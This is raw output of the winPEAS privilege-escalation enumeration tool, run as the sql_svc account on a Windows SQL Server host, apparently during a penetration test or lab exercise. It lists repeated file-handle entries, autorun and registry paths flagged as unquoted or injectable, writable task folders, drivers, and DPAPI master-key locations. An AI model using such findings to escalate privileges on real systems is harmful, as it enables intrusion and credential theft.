Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBLog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2796(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBData.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
model.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2916(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
modellog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2928(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
templog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2940(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2328(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
master.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
mastlog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2764(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBLog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2796(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBData.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
model.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2916(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
modellog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2928(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
templog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2940(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2328(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
master.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
mastlog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2764(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBLog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2796(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBData.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
model.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2916(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
modellog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2928(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
templog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2940(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2328(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
master.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2580(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
mastlog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2764(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBLog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2796(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
MSDBData.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2836(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
model.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2916(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb.mdf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2920(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
modellog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2928(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
templog.ldf
File Owner: BUILTIN\Administrators
===================================================================================
==============
Handle: 2940(file)
Handle Owner: Pid is 1652(sqlservr) with owner: sql_svc
Reason: TakeOwnership
File Path: \Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\DATA\
tempdb_mssql_2.ndf
File Owner: BUILTIN\Administrators
===================================================================================
==============
????????????????????????????????????? Services
Information ?????????????????????????????????????
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
[-] Looks like you cannot change the registry of any service...
????????????????????????????????????? Applications
Information ?????????????????????????????????????
RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Key: VMware User Process
Folder: C:\Program Files\VMware\VMware Tools
File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and
Space detected) - C:\
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
RegPath: HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
Key: AlternateShell
Folder: None (PATH Injection)
File: cmd.exe
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls
Key: PSAPI
Folder: None (PATH Injection)
File: PSAPI.DLL
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
RegPath: HKLM\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-
B018-4511-B0A1-5476DBF70820}
Key: StubPath
Folder: C:\Windows\System32
File: C:\Windows\System32\Rundll32.exe C:\Windows\System32\mscories.dll,Install
===================================================================================
==============
Key: StubPath
Folder: C:\Windows\SysWOW64
File: C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
===================================================================================
==============
===================================================================================
==============
===================================================================================
==============
Folder: C:\windows\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
===================================================================================
==============
Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
===================================================================================
==============
Folder: C:\windows
File: C:\windows\system.ini
===================================================================================
==============
Folder: C:\windows
File: C:\windows\win.ini
===================================================================================
==============
===================================================================================
==============
VMware PCI VMCI Bus Device - 9.8.16.0 build-14168184 [VMware, Inc.]: \\.\
GLOBALROOT\SystemRoot\System32\drivers\vmci.sys
QLogic Fibre Channel Stor Miniport Driver - 9.1.15.1 [QLogic Corporation]: \\.\
GLOBALROOT\SystemRoot\System32\drivers\ql2300i.sys
QLogic FCoE Stor Miniport Inbox Driver - 9.1.11.3 [QLogic Corporation]: \\.\
GLOBALROOT\SystemRoot\System32\drivers\qlfcoei.sys
Smart Array SAS/SATA Controller Media Driver - 8.0.4.0 Build 1 Media Driver
(x86-64) [Hewlett-Packard Company]: \\.\GLOBALROOT\SystemRoot\System32\drivers\
HpSAMD.sys
MEGASAS RAID Controller Driver for Windows - 6.604.06.00 [Avago
Technologies]: \\.\GLOBALROOT\SystemRoot\System32\drivers\percsas3i.sys
????????????????????????????????????? Network
Information ?????????????????????????????????????
===================================================================================
==============
Zone Maps
No URLs configured
Zone Auth Settings
????????????????????????????????????? Cloud
Information ?????????????????????????????????????
Learn and practice cloud hacking in training.hacktricks.xyz
AWS EC2? No
Azure VM? No
Azure Tokens? No
Google Cloud Platform? No
Google Workspace Joined? No
Google Cloud Directory Sync? No
Google Password Sync? No
????????????????????????????????????? Windows
Credentials ?????????????????????????????????????
Not Found
===================================================================================
==============
MasterKey: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-
1479773013-2644727484-962428355-1001\9499e43c-ccd0-4465-b19f-3d9ced256dd5
Accessed: 3/7/2025 8:06:38 AM
Modified: 3/7/2025 8:06:38 AM
===================================================================================
==============
MasterKey: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect\S-1-5-21-
1479773013-2644727484-962428355-1001\9f851a43-e6fe-4ab5-9be0-c931324190ab
Accessed: 7/26/2021 9:14:39 AM
Modified: 7/26/2021 9:14:39 AM
===================================================================================
==============
Not Found
Not Found
===================================================================================
==============
????????????????????????????????????? Browsers
Information ?????????????????????????????????????
Not Found
Not Found
Not Found
Not Found
???????????? Chrome bookmarks
Not Found
Not Found
Not Found
???????????? IE favorites
Not Found
SID: S-1-5-19
===================================================================================
==============
SID: S-1-5-20
===================================================================================
==============
SID: S-1-5-21-1479773013-2644727484-962428355-1001
===================================================================================
==============
SID: S-1-5-80-2652535364-2169709536-2857650723-2622804123-1107741775
===================================================================================
==============
SID: S-1-5-18
===================================================================================
==============
Not Found
Not Found
Not Found
Not Found
Not Found
Not Found
C:\Users\Default
C:\Users\Default User
C:\Users\Default
C:\Users\All Users
/---------------------------------------------------------------------------
------\
| Do you like PEASS?
|
|---------------------------------------------------------------------------------|
|---------------------------------------------------------------------------------|
| Thank you!
|
\---------------------------------------------------------------------------
------/